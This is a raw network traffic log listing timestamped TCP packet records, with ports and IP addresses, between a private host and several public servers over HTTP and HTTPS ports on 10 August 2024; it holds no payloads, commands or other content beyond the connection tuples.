Aug 10, 2024 16:12:22.109410048 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.109422922 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.109575033 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.109575033 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.112576008 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.112588882 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.112756968 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.114959955 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.114973068 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.114985943 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.115114927 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.115115881 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.117335081 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.117347956 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.117518902 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.119633913 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.119647026 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.119683981 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.119719982 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.122051954 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.122065067 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.122097969 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.124324083 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.124336958 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.124349117 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.124376059 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.124408007 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.125905037 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.125962973 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.153664112 CEST	443	49748	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:22.153769970 CEST	49748	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:22.172784090 CEST	49748	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:22.172797918 CEST	443	49748	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:22.173784018 CEST	443	49748	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:22.173842907 CEST	49748	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:22.174177885 CEST	49748	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:22.188772917 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.189199924 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.189384937 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.194278955 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.198196888 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.198535919 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.198739052 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.198750019 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.198796988 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.200021982 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.200036049 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.200100899 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.202337980 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.202353001 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.202404976 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.204844952 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.204859018 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.204914093 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.204914093 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.207307100 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.207319975 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.207330942 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.207343102 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.207365990 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.207365990 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.207382917 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.216501951 CEST	443	49748	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:22.218874931 CEST	80	49746	162.0.209.124	192.168.2.4
Aug 10, 2024 16:12:22.219085932 CEST	49746	80	192.168.2.4	162.0.209.124
Aug 10, 2024 16:12:22.219299078 CEST	49746	80	192.168.2.4	162.0.209.124
Aug 10, 2024 16:12:22.219675064 CEST	49749	80	192.168.2.4	162.0.209.124
Aug 10, 2024 16:12:22.219845057 CEST	80	49746	162.0.209.124	192.168.2.4
Aug 10, 2024 16:12:22.219909906 CEST	49746	80	192.168.2.4	162.0.209.124
Aug 10, 2024 16:12:22.224679947 CEST	80	49746	162.0.209.124	192.168.2.4
Aug 10, 2024 16:12:22.224694967 CEST	80	49749	162.0.209.124	192.168.2.4
Aug 10, 2024 16:12:22.224786997 CEST	49749	80	192.168.2.4	162.0.209.124
Aug 10, 2024 16:12:22.225065947 CEST	49749	80	192.168.2.4	162.0.209.124
Aug 10, 2024 16:12:22.225594044 CEST	49750	443	192.168.2.4	162.0.209.124
Aug 10, 2024 16:12:22.225620985 CEST	443	49750	162.0.209.124	192.168.2.4
Aug 10, 2024 16:12:22.228645086 CEST	49750	443	192.168.2.4	162.0.209.124
Aug 10, 2024 16:12:22.228888988 CEST	49750	443	192.168.2.4	162.0.209.124
Aug 10, 2024 16:12:22.228900909 CEST	443	49750	162.0.209.124	192.168.2.4
Aug 10, 2024 16:12:22.231534004 CEST	80	49749	162.0.209.124	192.168.2.4
Aug 10, 2024 16:12:22.233146906 CEST	49749	80	192.168.2.4	162.0.209.124
Aug 10, 2024 16:12:22.253321886 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.253412962 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.253914118 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.253928900 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.253993988 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.255994081 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.256007910 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.256036043 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.256073952 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.258446932 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.259258032 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.259270906 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.259310007 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.259340048 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.261626959 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.261641979 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.261713028 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.264054060 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.264069080 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.264163971 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.266051054 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.266067982 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.266136885 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.267895937 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.267925978 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.268064976 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.268095016 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.269784927 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.269802094 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.269814968 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.269845963 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.269880056 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.271719933 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.271735907 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.271783113 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.273628950 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.273644924 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.273710012 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.275732994 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.275748968 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.275799036 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.277267933 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.277282000 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.277295113 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.277331114 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.277360916 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.278971910 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.278985977 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.279014111 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.279042959 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.280740023 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.280755043 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.280797958 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.280797958 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.282371998 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.282387018 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.282412052 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.282444954 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.283893108 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.283909082 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.283935070 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.283982992 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.285455942 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.285474062 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.285486937 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.285502911 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.285531998 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.285531998 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.286955118 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.286972046 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.287009954 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.288415909 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.288430929 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.288470984 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.289901018 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.289921999 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.289935112 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.289958000 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.289984941 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.292690992 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.293025017 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.293040037 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.293071032 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.293071032 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.294141054 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.294193029 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.294682980 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.294735909 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.295348883 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.295361996 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.295408010 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.295408010 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.296530962 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.296546936 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.296627998 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.297748089 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.297764063 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.297775984 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.297853947 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.297853947 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.299019098 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.299035072 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.299082041 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.300230980 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.300246000 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.300314903 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.300314903 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.301516056 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.301531076 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.301543951 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.301599026 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.301640034 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.302665949 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.305026054 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.335268974 CEST	80	49747	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:22.335299969 CEST	80	49747	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:22.335334063 CEST	49747	80	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:22.335372925 CEST	49747	80	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:22.335860014 CEST	49747	80	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:22.336251974 CEST	49751	80	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:22.341690063 CEST	80	49747	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:22.341989994 CEST	80	49751	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:22.342102051 CEST	49751	80	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:22.342267990 CEST	49751	80	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:22.343056917 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:22.343152046 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:22.343369007 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:22.343580961 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:22.343597889 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:22.344382048 CEST	443	49748	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:22.344485998 CEST	49748	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:22.344496012 CEST	443	49748	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:22.344537020 CEST	49748	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:22.344583035 CEST	443	49748	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:22.344629049 CEST	49748	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:22.344634056 CEST	443	49748	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:22.344679117 CEST	49748	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:22.344702005 CEST	49748	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:22.344702005 CEST	49748	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:22.344710112 CEST	443	49748	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:22.344733000 CEST	443	49748	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:22.344779015 CEST	49748	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:22.344832897 CEST	49748	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:22.346247911 CEST	49742	80	192.168.2.4	194.58.114.223
Aug 10, 2024 16:12:22.349595070 CEST	80	49751	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:22.349667072 CEST	49751	80	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:22.352356911 CEST	80	49742	194.58.114.223	192.168.2.4
Aug 10, 2024 16:12:22.382656097 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.382750034 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.382977009 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.382989883 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.383018970 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.383049965 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.383913994 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.383928061 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.383960009 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.383974075 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.385138988 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.385154009 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.385200977 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.385942936 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.385955095 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.385986090 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.386003971 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.387191057 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.387204885 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.387217999 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.387228966 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.387254000 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.388530970 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.388546944 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.388556957 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.388569117 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.388597012 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.389002085 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.389014959 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.389054060 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.390279055 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.390295029 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.390422106 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.391510963 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.391525984 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.391572952 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.391572952 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.392456055 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.392472029 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.392529011 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.393522978 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.393537045 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.393549919 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.393573046 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.393595934 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.394418001 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.394432068 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.394469976 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.394495964 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.395385027 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.395400047 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.395446062 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.396419048 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.396433115 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.396503925 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.396531105 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.397381067 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.397396088 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.397409916 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.397433043 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.397468090 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.398329020 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.398344994 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.398406029 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.398406029 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.399255991 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.399270058 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.399303913 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.399359941 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.400197029 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.400211096 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.400254011 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.400254011 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.401082993 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.401101112 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.401128054 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.401164055 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.402045965 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.402060986 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.402074099 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.402106047 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.402106047 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.402842999 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.402857065 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.402894020 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.402909994 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.403908968 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.403924942 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.403943062 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.403956890 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.404007912 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.404020071 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.404021025 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.404711962 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.404727936 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.404738903 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.404798985 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.404798985 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.405621052 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.405636072 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.405648947 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.405690908 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.405721903 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.406418085 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.406434059 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.406445980 CEST	80	49741	185.215.113.16	192.168.2.4
